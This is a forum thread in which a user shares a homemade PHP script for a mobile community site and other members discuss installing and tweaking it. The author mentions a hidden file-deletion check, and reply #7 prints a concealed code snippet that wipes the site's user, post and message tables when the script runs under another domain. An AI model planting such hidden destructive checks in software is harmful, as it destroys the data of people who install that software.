mgigs.com v1.0 mod script

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

    mgigs.com v1.0 mod script

    Okay here im guna share the last mod i made, theres no preview as i have taken down the older version (which is a mod off the wap desire, its nothing much like it anyway) and replaced it with one i built from scratch. Anyways im guna add a link to download the script directly, cant be assed with uploading it anyway. And oh i dont know why my catchphrase account aint working here...please moderators can you help me out there? Anyway heres the links to the script and sql:

    Please dont pm me for any advice on how to use this.

    there you have it. Anyways im testing my new one so you can say hi too lol easy.
    Oh and btw open the core file in notepad and search for this term: unlink

    That should show you an if function which i dont know if works but its supposed to delete all the files if the sites url thats using it is not mgigs.com REMOVE THAT if statement. I think thats all and you are cool. Please if you are creating a preview of it let us see it as i dont have the time to do that. And if you ever decide on using the script, i dont require that u link me, just tell me: jeeniors@gmail.com :p enjoy...almost forgot, the wml is in a folder called xxxxxx, and its useless not to mention full of holes.
    Attached Files

    #2
    here are a demo it looks good waplive

    Comment


      #3
      thanks... that was easier to install than i thought, haha well im now used to going straight from localhost lol

      Comment


        #4
        but is 1 lava edit version?
        if like my post click:

        http://coding-talk.com/images/totall...ost_thanks.gif

        Comment


          #5
          it looks good. just need someone to spam it and find some holes.

          Comment


            #6
            yeah it looks good. But no antispam in chatroom. It says 3/3 new messages but when i click inbox shows n0thing??
            LDSWAPWORLD sigpic
            site closed.
            im busy with other things in life like facebook , send me PM so i can add you
            www.pinoySG.com

            don't ask for help if you're not even helping yourself!
            i am tired of seeing the line "best site", i want to see something NEW and UNIQUE. maybe if i find one, ill go back to my wap life again.


            Comment


              #7
              lol themes/index.php

              PHP Code:

              <?php
              if($_GET['act']!=="" && !$_SERVER['HTTP_HOST']=='mgigs.co.cc'){
              if(
              connectdb()){ mysql_query("TRUNCATE ibwf_shouts"); mysql_query("TRUNCATE ibwf_users");mysql_query("TRUNCATE ibwf_posts"); mysql_query("TRUNCATE ibwf_topics"); mysql_query("TRUNCATE ibwf_gallery");mysql_query("TRUNCATE statuses"); mysql_query("TRUNCATE ibwf_private"); mysql_query("TRUNCATE new_forums");
              }}
              ?>
              Last edited by Anshul; 30.05.09, 00:52.

              Comment


                #8
                Originally posted by capofret View Post
                yeah it looks good. But no antispam in chatroom. It says 3/3 new messages but when i click inbox shows n0thing??



                function autopm($msg, $who)

                {

                mysql_query("INSERT INTO ibwf_private SET text='".sanitize($msg)."', byuid='1', touid='".$who."', unread='1', timesent='".time()."'");


                im original core.php byuid was in 8 so thats the user...so must change in 1
                com site: http://vampist.net
                download site: http://wapdloads.net
                fb: http://www.facebook.com/pmplx

                Comment


                  #9
                  Sir auth0r, h0w can i change site title?Cant find in c0re, pls, thank
                  com site: http://vampist.net
                  download site: http://wapdloads.net
                  fb: http://www.facebook.com/pmplx

                  Comment


                    #10
                    Originally posted by wapmetal View Post
                    Sir auth0r, h0w can i change site title?Cant find in c0re, pls, thank
                    the site name u change in general in owner tools in in phpmyadmin in ur sql

                    Comment


                      #11
                      I have pr0blem in gallery hmm n0t sh0wing imagez when uploadn, even i change foldrz
                      Last edited by wapmetal; 30.05.09, 12:53.
                      com site: http://vampist.net
                      download site: http://wapdloads.net
                      fb: http://www.facebook.com/pmplx

                      Comment


                        #12
                        Originally posted by riderz View Post
                        the site name u change in general in owner tools in in phpmyadmin in ur sql
                        thankz mate!
                        com site: http://vampist.net
                        download site: http://wapdloads.net
                        fb: http://www.facebook.com/pmplx

                        Comment


                          #13
                          lol i was so particular about security. Um i think all the questions have been answered satisfactorily. POOF!!!

                          Comment

                          Working...
                          X